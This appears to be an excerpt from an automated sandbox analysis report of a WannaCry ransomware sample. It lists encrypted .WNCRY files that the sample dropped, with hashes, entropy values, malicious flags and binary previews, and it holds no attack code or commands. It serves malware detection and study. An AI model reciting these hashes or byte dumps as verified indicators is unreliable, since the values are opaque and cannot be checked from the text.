                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_16[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95112
                                Entropy (8bit):7.9979534591976025
                                Encrypted:true
                                SSDEEP:1536:a72mqrOcGJ57W3aEPcqItHyiJZ17Y74mCAQVB33KmBBlzibaMYbe03yhA2AdKB:a7VYJG77W3aYnItHtnY74mCAQVB/B/HQ
                                MD5:36A47190952AC79378DCEE472F09C764
                                SHA1:C016349124073D3133EB7C5BB284451051437225
                                SHA-256:DDAEE76866D3C58319DD8E77D2B241037CACE6248D5E2BAB8B467AC56B34715F
                                SHA-512:A917A4D67776CB862BCF1D48333FED379FB99940B210D7A78A5F498ABAE6185262AF3525E1427F041BA70F33B3E3F72FC1FB60513C73786835A874F68F3717BF
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......rOX}d..T..K.A.&...*....v..........`..:...&.N_.JQ.>.Rn._P.p(.G.|..y.i..A.m.2.'=ZH.32...b....u.0c....,...n.y.>-6.s.....S,.,..........'.3.i.tW.:..G....:.....Gl..I...n..og.../_a.Z.Q)D......H...E<..m..k.i6.NX..b.,V....we.02.w&....;._..H|............gr.......TJ.1....d.+w.......a..J.ew.*..v...l..(.]...a..^n{.B...(..p..N.c.lL.....]....o...Nr....}....c... *&..........._...hd^.....DC8...`Z...J.6...6U$.<..HZ"....d........(.S.V..6..s.;.r7~....H.%+.q#..T.]..#.ju(.t.U...0.../.........X....!..p5.[...F.i....u..yc$.x.H....Q.5.b+.-q).P|C..l....o...c.'..d.]....6.%9..e.....6.6n.,1.[."...+~Z.G..9m..0.ZE......E..O......Y..J.u1..@..7.k..N.........H...a}06).b...H........u....A.L.vv...s.;78..<.FX.....t1;.F@..a>sSe3.\...n..%6.C,7...=.I.....0{(...o~k...U..V..@.`o...kM...WsX.BAr2.T..._.. .G....~[.F/A....~...>.O..,F.......ZI.`...d.O..y......v..K..6%....m\6..a6T.r....y......|1..8'.L#..1v.)...S..O.$..t.#..%.....(\I.0K..V....-...B.{o.F...../....|..M..&.o

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_17[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6872
                                Entropy (8bit):7.9692803217288954
                                Encrypted:false
                                SSDEEP:96:oYesNuSjf1z1qeNhetFiKlO8PboU4btAkXPt1vEiwcXbM8NaA5WYjEicx1PUpbXE:FeJCf15qe6tFVOkin/ttzMlFicxRibyR
                                MD5:5C47455F71FA3AD318554AD436DF7549
                                SHA1:9C2FE23E9D90FE3FB37D29B540A0E4F71D74B944
                                SHA-256:BB626EBA6709B60F7B162276F4E90883004041123516D583068E5608D8F07B75
                                SHA-512:27EDEA493F89476F85DC9563795A6F52F99873E116AE76B5834F17F448B50E6AC5337666C48C1693782E7360615236D914E975738790D4EB7D130D319CE0D6EC
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!..../.h...G9.V.E....:..}7M..l.._.....k.v.^..8..%Y[)d3......Q...}...r...'Qb....._@...W.........1'...tj&~~.......aw...,..23.)'E....m4D...X>{.b...jrlY.RA...>@...0.&.R.<."..\....}........{e.-.:...2=T..)(.5...&..9..e`........edU.O.R.../BUh^.g...q..~.?A..............4....N...5..`.-.&..uS.....9.e.....G7;.....j.ES...k+..^X..b...;3$....~..|/ .&.D.V..~.K......v.B..y4...@\o..X..........1.F'..i.3..........c...E..2.i4.12.c1'.]..YB.<....e.8.b. ..D9`.....:..z..,^.H.8h.1...1%....^LVu.u.r#....U....Au)/x...`.......!....B.=F.#L......M..zq.....%+.Dg}....kh9...n7...XJ.+N`...........0....X....n...Z...dTO..<<.r.4fK... .......ry..&F..ZX^f)..[$..)...wi'.s.<....jAM.^2...U..d.C'.R....ot0...TGB...Y....p..5.....^...-xy...m...)~D..?Q..........Gl..x...T..+_.n..i..T...PLQ.....Z.Z.(..m/......Ii.,\e..F.w.....9....oh..3.>...5...g76......u..;.B<...wU@J..._....P.Sc=l.%.1......!...Oo..P&B.5;........'.Z.5..g..m...z..?......./..R..X...~e.;..V.....;..J.k)..?gxo...Z~g....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_18[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):122040
                                Entropy (8bit):7.998424207686981
                                Encrypted:true
                                SSDEEP:3072:qWbhg24UMxFpe1qw6P9MPcxYKxKNAKT3JFDlFsVk:qymKMxHKaPxxWxJdP
                                MD5:6BA774B65C629551E5DD9C33E08C1EEA
                                SHA1:14403B578F13AB2914F1F8E4E74805C5344E5058
                                SHA-256:11BA652646E030BA916DE8BD353B0FADC8E9C9680E8E412E0431DA308D0FF8EC
                                SHA-512:F1F75CC5A7223598F69FB638022C9F694A89DEEBD397376471AF4F80B6A481F28480A033774B41F3DFB5D3BAC72DF1984150A65B179EFACE34594CCE6BBF8AE7
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........%Wd.@br.).G...2....BxX.......em_........6... ......).9\....0k.....0&...cB*.u.....`..o..re.#.....u.3^+.=...^.#k...>.W.B/.i...j........$...o`.<W.`u+f..........,...!?.*>...g.s...+.jJyn....J.r..n..<&........k .K>.a....(z..S4..':....!%.....r.>3k.n............. .x.B..b..4..OV.F.jT/.I ..+g............O..Nq.<.b.8.....i.....u.....Og..I.^.k.g.iK...u.Y5G..$o.T...Z..............h.._w..%T...pd.K.KW..:C.z:..H.#...L.. .?...'....B...fp.{%....W.".%aU....2|.;$.r..1$...os...pU9P....Y)& .E.<..D.C.......A.m......h....dT.`..k.K..$.....A..cL....H.=.)./.y.U?q..G.FkW.l=.U_..f.A.(.M....4t.........B....8.P......w....o......[.7....r\...5PP...R%.....]...pf..a.[.dzB..J...U.......N.wl.yh.Xg8#..8..........|..z}..=..I9Q.%...k.S....m............:`.qf.K..Q..b...i......+.Vm.....a.H....<gs....$..8(.8<...R..4...I..jZ.B...0..G..ud.HO..zWJF...`.C#.k:E.......+6...C5@i.G..C.3..s.q.:.#4...O.OU.......o...f..F...7.E'....$+._.&..`Ks.;W..JEnm6.AF..l....8s...)S.!...P....ZC.L..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_19[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):121496
                                Entropy (8bit):7.998474973271479
                                Encrypted:true
                                SSDEEP:3072:ENgyjQRx6VeyxNyu97GOm0CwpXiL86zRdO6obWIxbBRH:3Z6Ou9tm0CwE865IxbHH
                                MD5:BCA4C596D8AEF892DD8895BBE21405D2
                                SHA1:A7CC24AB590A497ACA4C9B85356885125B66B791
                                SHA-256:3D6D98927C2CB06B44402BCBBDBBDC741E2895A648D50E1BE9C2DB8F0F21BD13
                                SHA-512:156685066677563AC911D1FE5D364148FBB398AFF69D977D4D046E29562EC80656DEECECA4F81420AB249F46C0D33377C8DF7C2C2549ECF0CC3D7BC1D1006940
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........!...s..7...~........f..Im..3O.....v.......Y'.X...;......g*.T....@.'..e..p./..VuL.]..WZZ.UM..[.:4.....p@...B.I!0.Qa..(d..Q.Tk+.SjI.C...X.7...|"...1....9U........*.jd4Sr.H..c9...i..Y~;.....#.@....<...#%e]]X..._..YLF...I...I...O...b._...................d....{..<#.Wfe.W^).b..#..'<...yD.......)w..<.]".I.x...\.\.?...e....]y^.X..F....7. S..J1U.>.IE.W]!C.E....w......`..7..6K.s.9......~..i...]4....E". .......h....H.\..1..1..4L.H...1XG..)C.7......{p........"..ZHU....<.T...c..wzA..AM..MP .Z.pIm0....En......g?.........n4..K4.*Op.%K.>$J.W..)..Q.<....e"*.|7-.59....e.s}........*n.O.Gm..(...Q.).C..Y..~.<.G.9T..~.P.3...*.m....7..r1..L9#.o.Y.............+......... A.=.}.......J|n.~.X..5.w{....Wx(?.l1.m\z......wC?N....5...$G.l.7...Js...E......_$....{d.W.3..Z...=..j.so!si..<...t..Y.....3m..+D...N.N...B.2j<NC:...sQ.t...Q..'..+....u...<....^.....E{.].HKJ.C8...........".-..rQ....Mk.9>.v.N..3b...{....r.7....l.g...#Z]x..0........stFu-...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_20[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):65784
                                Entropy (8bit):7.997033311270933
                                Encrypted:true
                                SSDEEP:1536:lYwd/2rusyR5hcWWuCndWw4Od31dTrDe1KUzPtVVcFLFbRLeRDrI:eI/2mu0CdWwndDeoUxVVgJbd2c
                                MD5:E00C37C800AE82394A726806CB313CF9
                                SHA1:F689FF82A909F823A348C790AAEABC88A16A3605
                                SHA-256:BD0861F21DA8E71E0AE954F17067EF03FE7ADB84D9250A4B7FCD0DB3268B6937
                                SHA-512:D2BCEFDE2239582BDF3E67A2725E625305617D4F2C075919B6183A9A330350D6057C0AF9ED5CC9BF645B2F632F7BE3E832B4013E1DCB2F83AEADEB96F5193AAB
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........9y...h....>.$.3<1..J.k.I"59.c...K.V.:OG.....Pj....5(.*..)<N$.....!.9HyF...E.$..(....s...#..l.f.......P...wd./.I.Z6.X.z.C.._:.R.L=..x.....p0ya..A..o.&..:....":..-..Hs:..q?0mf...*..d$.<.>7.2jV.-..Z.V}..CO(%...+..v.<.E.../......./..HZ...P..C............)...42....-........0W@.....yRf...d.LMI..k...X3....,,co.ot,..Dy.UV.SJ..b(.v..Z....!.5D..#.}..n.p..=.h<.c.M_..}..Z4tZ.~.#/|-.Zs..#......?....z...h.....p....... A..}8....`P@p....);.....3:......J..ac...C..U.........G+.*..../`....f..R.}^/v...UT."=1.....:... m.XWo?V<...l.c..?H;L..`A.t.E......r.8...[.%i[.3.mQU..L....9....!...(...../.m.z..MG..6r.F...OJ.n......y..i......9{d.8Jb.C....,..F......X.......1...................$...,`.../.8.......T.....`...V...{.H..h.M.. .._g.....A..Y{U..Et......`.E;?.~...... y.n.z^e.en....L.......Bf.C......_.&%..^..E.=..D.P=M.4m..N...L...82.........[Ul.I$.'.H.o.l.*........83.g...w.......q.5K.F.i...Cdmk.M..]..........i.B.dP.@.....<."J.....A.f..]..$@...H...T.)O..:.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_21[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):45800
                                Entropy (8bit):7.995902480623642
                                Encrypted:true
                                SSDEEP:768:rPLoNaRuP8pP1ePtpAEb5XVrIdZhcOUUQq71Dzgy36JusJ69gU2u9Wzm:rcNxKw0EdI7UvMWe6JZJ6WJu9Wy
                                MD5:D901C9AC2E794C4C59414FCFC2F6CF28
                                SHA1:88959F2966CC3C638D346F748B5BDC84BB8DA0B7
                                SHA-256:B31275BF3E09105102C389106055305D6A33C050AFBF2178ED698C2DBA4D8253
                                SHA-512:3009EAEAF3F3D2CC8EE5F717BBEAB3EC210A11F505916E2B96E82DF8D78E800AA916BE4A41D944A48CD89680ED268867EACC1FB38701C78855EC59408DBA001F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....N&....o...x ..oD..[....yG.S..e..'.........[.V....9J.}{.../.;.M.L.2.,k.....-......V..g.r..E..'5.`.3......L.o....`[Q.i.n.a.# ...gr.....lCB....'......b$mS.f.5.{.[.o.2........6D....d......}`..-...j..).`b.7..U..q.Al.b..r........O.t..p..#..2....5..6?.............6....}\i.Vo.2..{Y?.!6uy.G..-....q..n.J......?T.....c$..\.m..?...!...(....L...*w.C!rA/B%.C.yg[.io../_.u&].u..=........5y8....(..m.0 i.P[...=2dg.....p"o.Sz.....]..=..*.U..j.q....s....e.......Eu..Y...x.K..D6..x......7s..]....m.of..=Z|+...u.u `7.O.k..3......Z.}.....K.0....FS..P...l{.....c.G*.Z.;......q...af..J..[.xz..........>S8....L..m...l.`...?e.\..C.>%...r.&...GhCB..I.~.....()c..i.g..k..4{....88..[".N..u..."..;8...."...)..*..y:...Y....v..N...$_..5...+2fI.-5....ru.7. .Q...[....?....n9I..V...-V.f.2YVL..q......[.....CY... .].o...q..}6.....5~/*Y.........>..mF.r.k....o..o..Z.)...W..1.d.n.q..u..T..q#....v...Q_.2...}B.1.{..M|...D4..`..6..Wm5.....;..Mjw8*...B.&....f..~....E.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_22[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):202536
                                Entropy (8bit):7.999033851806259
                                Encrypted:true
                                SSDEEP:6144:i/liHcaxCcz2GEl9YcU3wHHJAcNYI5lmSIA4:20cmC0c3npA2xzq
                                MD5:C43E894352B8B8BF96E384B64D3E3C10
                                SHA1:8CC3470DDF9DA8911D96C4DA6A154D5047E0406A
                                SHA-256:99C42BFC8C2A05A41417191376B2A3A2116B98C9887EF23BCBCF3011CB9A0308
                                SHA-512:89F6EACC9E92B7AC2FC226B36633DC222CBE3ABAA883E5F447E8581D7C9A7CF10983D85DA862B4505DD2BDAD4830CE37C905F18A57EBA6241DAA4CE758C962B8
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....qT.:7.Y..=....b.~p9.!.#..~.a\v...0.~...1...f>....y.\...8<...d..~#..'r..D6.(:=.}.....x.?../.s....2e..#yQ....7.:.....;.qF51...f."7.a..9n..3n...9...w.r...*.s3K....m....N(#1.2.3.Q..-.t....f(.pT\...%.._..........E...........;s.;....f1..d....PB.T....{ ............)tv.@..2H.X.....5..[?G.A...]..Y..+=...UM..?4.U..s...s.^.]......MbW0...#..W.u.T..>~..|g......&1........d.`4.j....r.s9.....(.XuA.E#.6.q.lt.O.{.$2.q...4......J...K.!.....G.*eS'....J..U..Tw^..R....t!\..\.K....7F..g.H:.;=...R.._..a4|..$2.:.K...........R...O.....m.F......,-8?|...g.L....S&]...... .7vI^.@...=..<..v..\.A...e._._F....H.?.L.^..........H>....S.f..Q.3..._W...[..@.o....6.....g.G....%.TRP.R.)...I..1...@./2Y-q..9....+x=..rwD.-......d ...j.p..H......Z\^..}!...n..P-y.:.i'...z..D...l..%.......W..j..o...<.$..F.Xc.....V...x..v..^...i7r....K.5...."-.v.yv.xXK%..?..V....}....u.. g..R<.HS.[<...7.2....".....Yfk...c.ee...na...6\..@....N..^1.D,y..|`.).""..F.....|.....Q.9..:....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_23[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):16200
                                Entropy (8bit):7.98716465787195
                                Encrypted:false
                                SSDEEP:384:lhmyBMd34sPfz3FY8XiYErHBBTJ0zhBj6VxIKAbQK:lFBMdosPzFBXrI1yXj6zIKs1
                                MD5:FF73082314F9E6DCD7751FD87B4B042F
                                SHA1:830D54B7F745A6659019A500C9398F4724B9198E
                                SHA-256:8CF438E0B7B73D4062BA2320DF33F529ABCCA4BC545F203878E1751FFEF00FFF
                                SHA-512:A367279D1B81BBDE6CDF0868AF860CF526FBFC933634E36815CFE83871A2E77968A12E2953BFA9C232C8B732B7A7A32BC4967C27CCFFDE435E982E2C3B0E85C7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....`Rv.....T...e.(M....6*8*..^.r.....:.....q..N$tJ.q...ZEL$`..n....x..F.>...w..7.ja..t|.g._.z..Y.).h8..w...y.k.......rw....(D.P.*B.=R.lx.....1.`_A_....*0...JzO...Y.,..q9v.....qd.X2..c...*... ...bj..,..I.9....] .g.6\.^o.|{71!..+0.y6.h+V!.._V..y....+>.......i`0.g.@H.|PYj..7.._.....&.....W..!..8L.a.~{c.%S..]..=J........N...'^..... .?..C.....31f7...u.o[...K.9.}=.o.?.....6..Y.e...,..q04f..[vZ...N.e.....6fN..$!,i..s.....w7?...lxa7.....`.TEq1.G.$Y....G`.....V=..../.-v...V...%9...2...1.9G/.~.K..^...d..+.]8..0.L..h.sA.B.5...X.........V...[8...R...........c...x..+..........A*.Cb.BoKH....v..p.3...D..8..?...4.JD"r..W..J.....(z.Z..L;f..IL..T..$.x.e..[.J..f.",t%h.....<....kJ.V.l.l.y.!{s........+>i].!...i@..SP....X:.8.%..5.j.=......+. ..p._..x{...|Q..A..leq..X'.0..y1.8].Gj.....o5a....6..Y.i...pF..:.../ .^.U.(.yT.m.A;.L.h..}=.Y....z..j&..53....5y.....n.......i.hi.(DO...Rg..S..A.[..P...&....a..M)..w.&..#n......(@..> db.)r~A..n...8 =}..o....F

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_24[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):49160
                                Entropy (8bit):7.995621412312451
                                Encrypted:true
                                SSDEEP:768:enBd+w8gAVri36ckB2KFMtvW5fzBh8pKy8o8vrEMupBgS8/4QcGgrUbHxElZHVC0:ebJPAO6v/a1WJdhGDK4ryBcdWGzcpy
                                MD5:56B635FDADD32E72CE2E08AA60FF3AF4
                                SHA1:390A19B78ED2738E2AC4725C111590A6DA0A2B9C
                                SHA-256:16121E77CEEB1B0C4C16E559CC6D284047577E35F91FC6E073036C143C379D49
                                SHA-512:92B5FFE56012C400F085E95EA68CE33F2F45FEC181C0E9E8C338D4C426DCD60BEB2AEDBA933B47A3E458A2EC77EF87A546E20C6019E51F934EB6522F8DAEC301
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....|.wD..F3..Yxu..L...&..c..Z..o.}.x.Y..".$%z.#Ns.n...\........./..r...s..A.2w.2....#F.D%....:.....W.C..^P0d...\.5.b.N;../.E..q9....ihf.kL0e.$.@..TM.k...^U.K.H..kw2..&..z.9.$.q.j.."M.i~...y.....0...}.....$.\..g..-...b.!.D~..%.U."...Z..$.F....t...!..............*..|'y^...Mq.j.=...e..Q.B.i...?@.uO.G...%._:.u..l...."...U.....*.Q+Z[...0q.t..E`>1.....\.....wt14....qP&.W....L...3#.DQ.....i<.7#d....~Y.1...S./.........U....bU..p....d..$.`./N..)..s.....Uf..m.....e.}.8M....W..880#.:xvt;.l.@S...o..Y.m..#....rG../........Y..7sS..C..X....\......6.LT`.1...2..3..@..v..K.....(9.@?.....].6...Y.M..%.J.....Z/...V..!.\...-.. ..b..........A..x...9..i......s.5...b....lr.{.........";.1...D.8..<...I.......o$..3.B...kRPJ.kA.......f.rRT"..=O...(.....7Y.k..d.............dM.4..:..w..a..x...9.>.....I.....5f....rZ..G....Vl..p.|t../...1>....9.....=.{....k..F%&X..;.5zX.&:...o)3....DT..0....{....`.>...L.... k.d.+..T..I{m...@...].L..._...%..'.]&\39..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_25[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40328
                                Entropy (8bit):7.994770624576006
                                Encrypted:true
                                SSDEEP:768:zNm4oTk9t+VBuSb6bkocH0QsfrBhzv5K90k2kxI7Rh:5ETk9t+V90QsfrS2D7Rh
                                MD5:86AF0EFA74A74C71BD847B8E98E9DF3E
                                SHA1:32AEB9F7F0194E202640EDA7B4CD0F5054FB2038
                                SHA-256:B619038072C0109DB085BD43681AD701371086D1AFE5152DC1F357F17C913632
                                SHA-512:1935D570153AA003987A982FBB00EECAB96C0AC8BC033872FE3C20C39FE5D8F985B64970AA319D49E83EB339132F2A362C50241FB2BEC021268E555949A4689F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........1....Q.KC.d.>.QG6#l.P\.w\0........q:...Z~....S(S..%.p.jN8M..#2.vc..c...$. .Y.IN...w).1;2"h.*edP.a.......6-e......*lC.}........xw..Q.t..Sh.O......zZ...0...;<q[..z..........7dIl,4.......TQ>L.%.{..m_.o`.K._<v.bfk....N(....74...0.R2Q.@.c.<..........n........B..F..E...q+..q.PY{...W..EM}$b@..\U.c...;>c..........EM`.....v...Xi...2.J.u.c...).L..F....o<..k<.lA.H....y....[......]..u..hK.S.g....g\G..xoR..x."t.........ZX...g&.E....:.X.UBE..|G...v..Q.]x.H..o.0.n.{8.mS#.L.C..}9Vc..X.....7.....>....y..B&..N..1U...&.kG..A.'?.V.....m..J.0..] .r'..T,....T..-.....`P3...ET).K..6....)....(Y...;*..lo%.I.5n/ .....5=4...=..pN.....-tF....j.Q..h[.>..Z...j......'.9.V.6z..S.}..+..[.......#..|?..I-.h...W.6.x.4.u.l.C..7\q.{?...{...}....&."h4.?....kb^.?...,IB....-..\n..~cw...7F\....;....Y..qa...6.".\.x.C...u..7...^.c!.].\.....S|^...(.uz.s.c........%..ky..0Z.o.Vx...]..w.....X..l\.....e.O.k..:..P.wg. s....HCB.A......X..*.GW..s..L.E.w.m..._'.E..>..(.....B

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_26[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):799560
                                Entropy (8bit):7.999788883461205
                                Encrypted:true
                                SSDEEP:24576:t8H7Mh0HdftRyCNmTe9oYsaAiyqBXiHP/in886:tPiHdf3yCNZ4iZBXiv/in886
                                MD5:857E37794294AD27DD71FE7FAD518708
                                SHA1:D0F5129A5D677317D4C06742C3DC91DA0244B6E2
                                SHA-256:D5638464EC02F8CCA459FFDB7B32573503DEA91F21CBED28E2E2D675305D3C80
                                SHA-512:3E2BC37A6F6D6EC629DD9F8C6E3AE0B9C67A68017DB963AC9199584A7E9B0A632E94D019EE4EFA8AEC4B3B9E94DB82B403FF7B08B3615078BBB583987A2F5C99
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....}.M.,_.3..D$..\.7... .a..aW.p.........S;.._..G.e.l..z.-...,T..w......W"..>F.+l..[.sf...I..(..\./......3.42.}....O)=.<pw....!..x....%..9?K..4.._...tEx.^\o..3.CCv....,..x.>9..eT2..3/gf..........E.X...Ts..A..#...%c.f..S.|..W.H.)....ABkP.j.1.F.....9...../2.......@...z2;)....0.d...t.iw..!...3...7.....\...R...^...9.c...|...V]..4.Q]...&...[.......b.ez.5...#.u...10z.V?........iF.%.9- ....z....\......0......lk...M.:d!<............A...b.....4.Z_..t..8...oz..!M.....3.C..`s.....bDdT..&....]...y.....yqS...?T7S..q...k...l.:.....s...V.Y.......j.t.....j.....{.e.B....%s"\%.W$.....-.P.dc.}b..G.% y:E...&.r2co,...8..);.....l.i..U..F.GDM...W.........@.....p...O.C.X..Q..H.aT4.X.X..........y8y...-|5>.eF............/.`.n|......s|..... f~.~.3..n)=.<}.~x.{.LzX..%V|..fu..ro.#.z...*7....-...D......^..$..y..$+..I...^g.Z.K.....i7...f.-s...?6......].2:q....a|..D...F.2=.....Df.......:f,.<....v...-..QJ..".#?].Z...^-...E..Hr...(...n..*y....WY7:.W...[.}.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):89144
                                Entropy (8bit):7.998195851740088
                                Encrypted:true
                                SSDEEP:1536:rHsy5UKBGQ9KVnYXR4dJMeDIi9PeX9Dxpf3Fqg0T+/QfR+cVYXvtTJn:rlUKBGQ9KVnYXR4zM1iA9gg0NRNVYfzn
                                MD5:28C1F1C542F40B128268CD67F83A1649
                                SHA1:AD1D412AE5590C242603B6EF331B897E87FEBB4C
                                SHA-256:AEF1DB307348C0DCE0A7F668CF76349A447504FAE0477F14F2793AAF788D4E4E
                                SHA-512:1FDDA9773BC7B0E61506221B8153E63FE50D537B85FA2CA349E48F1F6E4AF6DAF1CD8CE748574261986E03F32E6B124FDA2AA5A187E980703C82E6F6434F5513
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......c.a.L....m...%.by.....%..X....4DP[..q5.8.GT...h.....}Y/..M[..V...tV2.P.IFp...WD..fm..\.x....Q.%....^...u.k'..p..=.5.G93.!..l...s)/.@...;Q.6k..z....b..j^.o...h8`..6..P...%1..8..j..........=.......+.%t...ZT....&...;ne?Wty..8....;..V~...2....o...2...... [......k.<l....j.......B.0.b....]...B...9d.....Sxy!.......}vSb.G....s....;...\.-.......KM........N$...c.......O'}...R.....r...;G...b.-....8O..s.... ..<@.[>.R@.2...?.>......^.yqm......I.81Lz..D.g...g.r...:,..`-;.Fm.'yB.r....).h...8O...K..*....%8.P..TI.....Z....;~......dF,Pi0..&&)... .....Ca......DY....f........O/}....(....tGH..O.WV....1.P8+..z.8......+J..\q..C..v..]Ap..eL"-.......xQ....L.zy.W...B}.%..0P..j2;...J....,...D~.BTgR..]...=....9.>..T...J..N)..pD..../.7.hEogo.....s..q.8......g. .B.s<E.mE.....Yl1..v.l"m..5..9....9..la~=!....*Z........w.R.#..m....,Gme.G...`S~iP%J.......t|.fb...H..aSz.c....q....B82.1..L.P9......4.cPp...Tq..81z...a?...:.....o_P.jK.C.y...]fd.q..\(...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_28[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):186072
                                Entropy (8bit):7.99898605840687
                                Encrypted:true
                                SSDEEP:3072:43plQiwYlg5czwfxot7VywUKStM+Q++OxeoWnI24qLdj4VnDcqk0NbfsnTKVUhI:4LIYG5WwfO5+PxelIedjODcqk0Nbfsn0
                                MD5:2B5101D3A4C9640231CCC0338F202DDA
                                SHA1:245FDB1D00D674074706ABF05AF57AFF516A056B
                                SHA-256:DCAA3DCE6B5458301F096EE2A380DCCE19E501B6759950EFC95EF9606F766BF5
                                SHA-512:79A9F274A3986D7EA2CDF0B0990970147AE9A346961E519A8332CA19FEB98B8BC7ED502CFC45BDC43FF047678D4ADC0E3D063AD27FEF05295A84D14BB22C6CDF
                                Malicious:true
                                Reputation:unknown
